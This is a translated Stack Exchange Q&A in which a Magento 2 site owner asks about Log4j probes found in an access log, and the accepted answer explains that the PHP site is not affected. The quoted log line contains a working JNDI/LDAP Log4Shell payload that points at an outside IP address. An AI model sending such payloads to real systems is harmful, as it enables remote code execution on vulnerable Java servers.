访问日志中的多个Log4漏洞
访问日志中的多个Log4漏洞
提问于 2021-12-20 17:50:19
我在magento2中的应用。我查了我的访问日志。访问日志中的多个条目如下所示。我不确定是否在我的代码中注入了log4j,因为每个请求都是302。请查看下面的访问日志示例。
"GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D HTTP/1.1" 302 275 "${jndi:ldap://167.99.115.242:1389/Binary}" "${jndi:ldap://167.99.115.242:1389/Binary}
回答 1
Webmasters Stack Exchange用户
回答已采纳
发布于 2021-12-20 20:18:31
Magento 2是一个PHP框架。Log4j是一个(易受攻击的) Java依赖项。由于PHP不包含任何Java依赖项,所以您不会被这种攻击利用。
页面原文内容由Webmasters Stack Exchange提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://webmasters.stackexchange.com/questions/137956
复制相关文章
相似问题
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号